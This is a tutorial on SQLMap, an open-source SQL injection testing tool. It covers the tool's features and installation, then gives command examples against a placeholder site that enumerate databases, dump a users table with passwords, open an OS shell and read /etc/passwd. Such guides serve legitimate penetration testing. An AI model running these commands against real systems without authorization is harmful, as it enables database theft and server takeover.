SQLMap is a free open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities, as well as taking over database servers. This tool has a powerful detection engine, many specialized functions for penetration testing professionals, and a wide range of capabilities: from database identification to data extraction, file system access, and even executing operating system commands through out-of-band connections.
Main Features of SQLMap
- Support for numerous DBMS systems: Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, Raima Database Manager, YugabyteDB, Aurora, OpenGauss, ClickHouse, and Virtuoso.
- SQL Injection Techniques: Support for six different SQL injection techniques:
  - Boolean-based blind injections
  - Time-based blind injections
  - Error-based injections
  - UNION query-based injections
  - Stacked queries
  - Out-of-band injections
- Additional Capabilities:
  - Direct connection to databases without using SQL injections
  - Enumeration of users, password hashes, privileges, roles, databases, tables, and columns
  - Automatic recognition of password hash formats and cracking them using dictionary attacks
  - Dumping entire table contents or partial ranges of records
  - Searching for specific databases, tables, or columns
  - Downloading files from and uploading files to the server’s file system
  - Executing arbitrary commands on the database server
  - Creating out-of-band TCP connections between the attacking machine and the server
  - Elevating privileges of the database process user
Downloading SQLMap
(Note: SQLMap is installed by default in Kali Linux. There, the commands listed below are run without the “python” prefix.)
The best way to download SQLMap is to clone the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
Alternatively, you can download the latest version in zip or tar format from the official website.
Examples of Using SQLMap
Basic Commands
Basic URL checking for SQL injection vulnerabilities:
python sqlmap.py -u "http://target-website.com/page.php?id=1"
Testing a specific parameter:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -p id
Using cookies:
python sqlmap.py -u "http://target-website.com/page.php" --cookie="PHPSESSID=abcdef123456"
HTTP Basic Authentication:
python sqlmap.py -u "http://target-website.com/page.php" --auth-type=basic --auth-cred="username:password"
Advanced Examples
Enumerating the available databases:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --dbs
Enumerating tables of a specific database:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -D database_name --tables
Enumerating columns of a specific table:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -D database_name -T table_name --columns
Dumping data from a specific table:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -D database_name -T table_name -C "column1,column2" --dump
Using only the time-based blind technique:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --technique=T
Executing operating system commands:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --os-shell
Downloading a file from the server:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --file-read=/etc/passwd
Uploading a file to the server:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --file-write=local_file.txt --file-dest=/tmp/remote_file.txt
Example of a Complete Pentest Scenario
- Vulnerability detection:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --batch
- Determining database version:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --banner
- Enumerating all available databases:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --dbs
- Enumerating tables in an interesting database:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -D users_db --tables
- Enumerating columns in the users table:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -D users_db -T users --columns
- Dumping user data:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -D users_db -T users -C "username,password,email" --dump
Important SQLMap Parameters
- -u, --url — URL to test
- -p — parameter to test
- --cookie — HTTP cookie to use
- --data — data to send in a POST request
- --dbs — enumerate databases
- --tables — enumerate tables
- --columns — enumerate columns
- --dump — dump data
- --batch — run in non-interactive mode
- --technique — SQL injection techniques to use
- --time-sec — seconds of delay for time-based attacks
- --threads — number of threads (for acceleration)
- --proxy — use a proxy
- --level — testing level (1-5, default 1)
- --risk — risk level (1-3, default 1)
Conclusion
SQLMap is an indispensable tool for penetration testers and web application security specialists. It allows automating the process of detecting and exploiting SQL injection vulnerabilities, which significantly improves the efficiency of web application security testing.
Disclaimer and Legal Information
SQLMap is free software distributed under the GNU General Public License v2.0. Using SQLMap to attack targets without prior mutual consent is illegal. It is the end user’s responsibility to comply with all applicable local, state, and federal laws. The developers are not liable for any misuse or damage caused by this program.
Remember: This tool should be used exclusively for legitimate penetration testing and security assessment with proper authorization.
- Similar resources – https://sqlmap.org/
- Similar resources – https://itorakul.com.ua/ethical-hacking




